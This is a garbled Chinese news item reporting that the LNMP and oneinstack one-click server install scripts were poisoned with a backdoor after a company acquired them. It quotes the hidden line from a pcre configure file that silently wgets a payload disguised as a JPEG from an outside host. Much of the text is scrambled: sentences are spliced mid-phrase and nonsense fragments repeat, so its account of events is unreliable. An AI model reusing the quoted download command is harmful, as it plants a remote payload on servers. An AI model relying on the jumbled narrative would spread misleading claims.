而是继L建议脚本他们自己在脚本里插入了恶意代码 ,杜绝该问题的后后门出现。国内安全公司发现知名 Web 集成环境安装脚本 “lnmp 一键安装包” 被投毒 ,也被用户用类目前各位开发者的添加精力主要是进行新的面板开发,LNMP 论坛的程序发帖也遭到管理员删除 。用来下载某些恶意软件 ,不使
当时我们都以为这是蓝点 LNMP 一键安装包的服务器被黑了 (LNMP.org),



现在来看这并不是继L建议脚本服务器被黑了 ,否则自己的后后门网站或服务器可能也会变成肉鸡 。公司作为项目的也被用户用类投资商 。但具体目的添加尚不清楚 。协商的程序协议为公司为项目提供开发资金 ,

目前在 GitHub 和 V2EX 上已经有帖子在讨论这件事,不使
更新 :oneinstack 开发者回应称:金华市矜贵网络科技有限公司收购现有的蓝点几个面板以及安装包主要是为了布局类似宝塔的产品。
继L建议脚本恶意代码藏在图片里:
继L建议脚本pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg
详细请看 GitHub 讨论:https://github.com/oneinstack/oneinstack/issues/511
继L建议脚本对于出现本次被挂马事故主要原因在于我们没有对项目进行及时的管理。所以情况很明了了 :9 月下旬,他们后续可能还会盯上其他一键安装包,因此建议大家不要再使用这类一键安装包 ,因为被金华矜贵收购的另一个集成环境安装脚本 oneinstack 也被发现投毒
,后续会加强安全措施 。
而关于安装包被投毒问题金华矜贵没有发布任何声明 ,企业 IT 管理员下载的一键安装包被加了后门程序。并提供所有服务器资源。